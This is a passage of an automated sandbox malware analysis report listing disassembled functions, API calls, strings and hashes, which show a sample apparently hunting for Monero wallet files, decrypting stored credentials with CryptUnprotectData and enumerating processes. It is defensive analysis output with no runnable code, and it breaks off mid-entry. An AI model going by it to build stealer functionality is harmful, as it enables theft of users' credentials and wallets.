                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 6d8be36839c605a1a4c5edbf6d12f0d1aa3c5bb1524db95205ad1741f8de2b15
                        • Instruction ID: b38c009a5bd61397ffe6aa73f26f9517b8f60244fe7044277092a9d08d8a30b2
                        • Opcode Fuzzy Hash: 6d8be36839c605a1a4c5edbf6d12f0d1aa3c5bb1524db95205ad1741f8de2b15
                        • Instruction Fuzzy Hash: CB413A71940218ABDB24DB94DC9DBEEBBB4FB48700F205199E14972181DB342F85CFA1
                        Function 00E2E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E40D73), ref: 00E2E4A2
                        • StrCmpCA.SHLWAPI(?,00E414F8), ref: 00E2E4F2
                        • StrCmpCA.SHLWAPI(?,00E414FC), ref: 00E2E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 8005ec347e257e80a84935d9de92ca392a42bcac4b066d4a67b247f552a029a1
                        • Instruction ID: acf5e6499ab20a62d9184dba949a1f26f8ec5ec68466625b0ffdf249e98e8b22
                        • Opcode Fuzzy Hash: 8005ec347e257e80a84935d9de92ca392a42bcac4b066d4a67b247f552a029a1
                        • Instruction Fuzzy Hash: BE126532910118AADB18FB60DC9EEED77B8AF54300F4451F9B54A72191EE346FC9CB92
                        Function 011EBB9D Relevance: 9.1, Strings: 6, Instructions: 1627COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: $Vw?$p8w}$zduY$zV$gsY$yo_
                        • API String ID: 0-1116265706
                        • Opcode ID: acb2a552c45614a87ad5936ad1400404a0fce655a930ee5ca8766d34c331a168
                        • Instruction ID: 36c1b2295e80808bf81ec404544a9acdeabe016c22de111bfa1009d5f784424a
                        • Opcode Fuzzy Hash: acb2a552c45614a87ad5936ad1400404a0fce655a930ee5ca8766d34c331a168
                        • Instruction Fuzzy Hash: CFB219F36082049FE304AE2DEC8567AFBE9EFD4720F1A493DE6C5C3744EA7558058692
                        Function 011F0D8A Relevance: 9.1, Strings: 6, Instructions: 1587COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 4d}$=$mp$Ul#$hj6w$y;{Z$a#7
                        • API String ID: 0-388246791
                        • Opcode ID: bf66c70e24cd64fcdf007d4cf71822db3b08ff730589b308db25794536052364
                        • Instruction ID: f0296ad532216821bb0c73d1f7b8cb14a75908ac3a78c0abbad8e3a670f94245
                        • Opcode Fuzzy Hash: bf66c70e24cd64fcdf007d4cf71822db3b08ff730589b308db25794536052364
                        • Instruction Fuzzy Hash: EEB2D4F36082009FE3046E2DEC85A7ABBE6EFD4720F1A493DE6C5C7744E63598058697
                        Function 00E29AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                        • LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID: N
                        • API String ID: 4291131564-1689755984
                        • Opcode ID: ebf359ce369d3b653430c58ed7dcd81470e47e3b50143de1335149c2f0bc0b06
                        • Instruction ID: d7a12ada816bb25c4996ab0c80abe8d6315039dfe93ad9e749bea75412a4cd0e
                        • Opcode Fuzzy Hash: ebf359ce369d3b653430c58ed7dcd81470e47e3b50143de1335149c2f0bc0b06
                        • Instruction Fuzzy Hash: FE11A4B4240208EFEB10DF64D895FAA77B5FB89704F209058F915AB394C776A901DB94
                        Function 011EA012 Relevance: 7.9, Strings: 5, Instructions: 1673COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: )[\z$1^}i$=kgw$Q>^1$z'|
                        • API String ID: 0-4030652101
                        • Opcode ID: 902a78efb30863ba22c54c5ea0d1bd54a57543de7a8ef7f3f90a592b04a3f8e4
                        • Instruction ID: c61dd034b1c0645dda2a0fee242c2c706b3484c5bbe5a980a759f2476685d48c
                        • Opcode Fuzzy Hash: 902a78efb30863ba22c54c5ea0d1bd54a57543de7a8ef7f3f90a592b04a3f8e4
                        • Instruction Fuzzy Hash: C0B219F360C204AFE3046E2DEC8567AFBE9EF94720F1A453DEAC5C7744EA3558018696
                        Function 011E6B7C Relevance: 7.8, Strings: 5, Instructions: 1534COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #<~u$=O_$LJ4g$O&Ow$~^|
                        • API String ID: 0-913667623
                        • Opcode ID: 350c2d653bd42655cbd20a8339a5ef6d50dd1d75544cd786a3c71b14bb995358
                        • Instruction ID: 591b5d5ac755124e310eda916227ca4d7caa71969eee64d9834aa0477f64c3e9
                        • Opcode Fuzzy Hash: 350c2d653bd42655cbd20a8339a5ef6d50dd1d75544cd786a3c71b14bb995358
                        • Instruction Fuzzy Hash: 51A217F3A082109FE704AE2DEC4567AFBE5EF94320F1A493DEAC4C7744E63598058796
                        Function 00E2C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E2C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E2C87C
                        • lstrcat.KERNEL32(?,00E40B46), ref: 00E2C943
                        • lstrcat.KERNEL32(?,00E40B47), ref: 00E2C957
                        • lstrcat.KERNEL32(?,00E40B4E), ref: 00E2C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: 8bcb03e588a1391ad692422eab7c35b3248e27a5104907f49e9fb500ea177822
                        • Instruction ID: 2390e59de9cad020648819628b8e8865a7d5e249e82ecbbf8c8daffd4ee0bef1
                        • Opcode Fuzzy Hash: 8bcb03e588a1391ad692422eab7c35b3248e27a5104907f49e9fb500ea177822
                        • Instruction Fuzzy Hash: 4841737590421ADFCB20DFA4DD89BEEB7B8BB88704F1045A8F509B7280D7755A84CF91
                        Function 00E27240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E2724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E27254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E27281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E272A4
                        • LocalFree.KERNEL32(?), ref: 00E272AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: c469f37cb3e57a1a39f0e145dc2195ced38ab77d68e9c798db2a048c6cc7211b
                        • Instruction ID: b9d1a500098c2a8d198458b6ceffab84efb9e3b61516583ef82214651a5fe3ab
                        • Opcode Fuzzy Hash: c469f37cb3e57a1a39f0e145dc2195ced38ab77d68e9c798db2a048c6cc7211b
                        • Instruction Fuzzy Hash: 1F0100B5B40208FBDB20DFD4DD46F9E7778AB44704F104158FB45BB2C4D675AA018B65
                        Function 00E39600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E3961E
                        • Process32First.KERNEL32(00E40ACA,00000128), ref: 00E39632
                        • Process32Next.KERNEL32(00E40ACA,00000128), ref: 00E39647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00E3965C
                        • CloseHandle.KERNEL32(00E40ACA), ref: 00E3967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 50a319423651f3ecdcc53706f5c364b31ca28c51daad3a23cdec3865882a3ed9
                        • Instruction ID: 79ab6df1d0dcc5acf6daa8825eabe2d005297f25affc8f7e2669b543e007a352
                        • Opcode Fuzzy Hash: 50a319423651f3ecdcc53706f5c364b31ca28c51daad3a23cdec3865882a3ed9
                        • Instruction Fuzzy Hash: C7010C75A01208EFCB24EFA5C949BEDBBF8FB48300F104188E94AA7251D779AB44DF50
                        Function 011EF22E Relevance: 6.7, Strings: 4, Instructions: 1653COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: :$/G$@lz5$AR7o$rr~
                        • API String ID: 0-3404655268
                        • Opcode ID: 9353ef00e74c87d111c644eab1ecb4d90608e5a5541274c47e038a5a75e63f21
                        • Instruction ID: c8ef7bc47483649ce6d031b7467d42ad95a5ec8cb27326ca81e240ed4f439544
                        • Opcode Fuzzy Hash: 9353ef00e74c87d111c644eab1ecb4d90608e5a5541274c47e038a5a75e63f21
                        • Instruction Fuzzy Hash: F0B21AF360C2049FE304AE2DEC8567ABBE9EF94720F1A453DE6C4C3744EA3598058796
                        Function 011E1AB9 Relevance: 6.6, Strings: 4, Instructions: 1613COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
